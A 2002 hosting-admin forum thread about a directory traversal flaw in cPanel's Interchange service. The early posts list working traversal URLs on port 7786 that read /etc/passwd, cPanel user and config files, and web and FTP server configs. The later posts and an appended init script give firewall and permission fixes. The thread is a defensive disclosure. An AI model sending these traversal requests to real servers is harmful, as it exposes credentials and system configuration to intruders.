The Community Forums


Am I cracking up or.....

Discussion in 'General Discussion' started by Stormtrooper, Aug 9, 2002.

  1. Stormtrooper

    Stormtrooper Active Member

    Joined:
    Dec 18, 2001
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    Ok redhat users, try this one on your server:

    http://YOURSERVER.COM:7786/../../../../../../../../../etc/passwd

    let me know if you see anything strange....
     
  2. feanor

    feanor Well-Known Member

    Joined:
    Aug 13, 2001
    Messages:
    836
    Likes Received:
    0
    Trophy Points:
    16
    confirmed- gaping hole in Interchange.

    AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    researching now.
     
  3. itf

    itf Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    It is not necessary to use "../" 9 times after 7786/; 6 times are enough

    http://domain.com:7786/../../../../../../etc/passwd
    http://domain.com:7786/../../../../../../etc/group
    http://domain.com:7786/../../../../../../etc/named.conf
    http://domain.com:7786/../../../../../../root/anaconda-ks.cfg
    http://domain.com:7786/../../../../../../usr/local/cpanel/etc/cpanel.config

    change username with usernames in /etc/passwd
    http://domain.com:7786/../../../../../../var/cpanel/users/username


    it seems it is not necessary to waste time for SSH connection !!!:)
    http://domain.com:7786/../../../../../../etc/httpd/conf/httpd.conf
    http://domain.com:7786/../../../../../../etc/proftpd.conf
    http://domain.com:7786/../../../../../../etc/hosts


    in brief everything in a server.

    Damn hole


    I stopped Interchange on our critical servers
     
  4. Stormtrooper

    Stormtrooper Active Member

    Joined:
    Dec 18, 2001
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    /*fix removed*/


    CPANEL is too "smart"....it 'un'chmod's the file...if we get something I'll be happy to share it
     
  5. feanor

    feanor Well-Known Member

    Joined:
    Aug 13, 2001
    Messages:
    836
    Likes Received:
    0
    Trophy Points:
    16
    I submitted a bug to redhat regarding this, using one of their boxes as an example....
    hopefully that means they will take action soon.
    :p

    If anyone has a fix for this that allows IC to stay running, please share... we are working on one internally at this time.

    :p
     
  6. itf

    itf Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    To stop Interchange, use these commands in a root SSH session:

    /etc/rc.d/init.d/cpanel3 stop

    chmod 600 /usr/local/cpanel/bin/startinterchange

    /etc/rc.d/init.d/cpanel3 start
     
  7. Stormtrooper

    Stormtrooper Active Member

    Joined:
    Dec 18, 2001
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    now, like the "kill interchange" thing I posted...does cpanel find the improper permissions and "fix" it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission
     
  8. itf

    itf Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    Originally posted by Stormtrooper:

    > now, like the "kill interchange" thing I posted...does cpanel find the improper permissions and "fix" it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission

    chmod 500 leaves it executable for Root and cpanel can run it; use chmod 600 and it will not run until the next cpanel upgrade
     
  9. feanor

    feanor Well-Known Member

    Joined:
    Aug 13, 2001
    Messages:
    836
    Likes Received:
    0
    Trophy Points:
    16
    just disable interchange in "service manager" via WHManager- it's much, much less painful.

    hopefully we have a patch soon.
    REDHAT bestow your mighty skillz upon us!
     
  10. bdraco

    bdraco Guest

    /sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
    /sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY


    Running the above should allow interchange to continue to function and prevent people from remotely taking advantage of this hole.
     
  11. bert

    bert Well-Known Member

    Joined:
    Aug 21, 2001
    Messages:
    602
    Likes Received:
    0
    Trophy Points:
    16
    Thanks Nick. It worked :p
     
  12. techark

    techark Well-Known Member

    Joined:
    May 22, 2002
    Messages:
    280
    Likes Received:
    0
    Trophy Points:
    16
    Nick ?

    Why am I getting protocol not available when I run those commands?
     
  13. techid

    techid Member

    Joined:
    Aug 5, 2002
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    I also am getting the same thing...

    root@capital ]# /sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
    ipchains: Protocol not available
     
  14. joana

    joana Well-Known Member

    Joined:
    Sep 29, 2001
    Messages:
    103
    Likes Received:
    0
    Trophy Points:
    16
    ipchains: Protocol not available
     
  15. MarlboroMan

    MarlboroMan Well-Known Member

    Joined:
    Dec 7, 2001
    Messages:
    64
    Likes Received:
    0
    Trophy Points:
    6
    Possibly you have to use IPTables instead of IPChains?

    /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
    /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

    (correct me if the statements are wrong, that's been known to happen)
     
  16. bdraco

    bdraco Guest

    Right .. your machine might have iptables instead of ipchains.

    If it still doesn't work
    try

    modprobe ipchains first

    If still not, then you need to recompile your kernel with ipchains or iptables support.
     
  17. joana

    joana Well-Known Member

    Joined:
    Sep 29, 2001
    Messages:
    103
    Likes Received:
    0
    Trophy Points:
    16
    Originally posted by MarlboroMan:

    > Possibly you have to use IPTables instead of IPChains?
    >
    > /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
    > /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY
    >
    > (correct me if the statements are wrong, that's been known to happen)

    root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT

    root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

    iptables v1.2.4: Couldn't load target `DENY':/lib/iptables/libipt_DENY.so: cannot open shared object file: No such file or directory

    Try `iptables -h' or 'iptables --help' for more information.
     
  18. Annette

    Annette Well-Known Member
    PartnerNOC

    Joined:
    Aug 12, 2001
    Messages:
    445
    Likes Received:
    0
    Trophy Points:
    16
    Try this instead:

    /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

    iptables uses REJECT as the default instead of DENY.
     
  19. joana

    joana Well-Known Member

    Joined:
    Sep 29, 2001
    Messages:
    103
    Likes Received:
    0
    Trophy Points:
    16
    Originally posted by Annette:

    > Try this instead:
    >
    > /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT
    >
    > iptables uses REJECT as the default instead of DENY.

    It worked..Thanks :)
     
  20. MarlboroMan

    MarlboroMan Well-Known Member

    Joined:
    Dec 7, 2001
    Messages:
    64
    Likes Received:
    0
    Trophy Points:
    6
    Another note....

    If you reboot your machine, these firewall rules get flushed.

    You might want to put those two commands in one of your init scripts until Interchange releases a permanent fix.
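
The init-script approach suggested in the last post, as an added example that is not code from any poster in this thread: it re-applies the two port 7786 rules at boot without duplicating them on repeated runs, and keeps the loopback ACCEPT ahead of the REJECT. It assumes an iptables recent enough to support `-C` (check), which the v1.2.4 shown above predates; the function names and the `IPTABLES` override are hypothetical.

```shell
#!/bin/sh
# Added example: re-apply the thread's port-7786 rules at boot, idempotently.
# Assumes an iptables with -C/--check; override IPTABLES to test with a stub.
IPTABLES=${IPTABLES:-/sbin/iptables}
PORT=7786   # Interchange port named in the thread

# ensure_rule <insert|append> <rule spec...>
# Adds the rule to INPUT only if an identical rule is not already present.
ensure_rule() {
    mode=$1; shift
    if "$IPTABLES" -C INPUT "$@" 2>/dev/null; then
        return 0            # already in place, nothing to do
    fi
    case $mode in
        insert) "$IPTABLES" -I INPUT 1 "$@" ;;   # top of the chain
        append) "$IPTABLES" -A INPUT "$@" ;;     # end of the chain
        *) echo "ensure_rule: unknown mode $mode" >&2; return 2 ;;
    esac
}

protect_interchange() {
    # The loopback ACCEPT must be evaluated before the REJECT. Inserting it at
    # position 1 keeps that order even when an older REJECT is already loaded.
    ensure_rule insert -p tcp -s 127.0.0.1 -d 127.0.0.1 \
        --destination-port "$PORT" -j ACCEPT
    ensure_rule append -p tcp --destination-port "$PORT" -j REJECT
}

# Init-script style entry point: only "start" touches the firewall.
case "${1:-}" in
    start) protect_interchange ;;
esac
```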
     
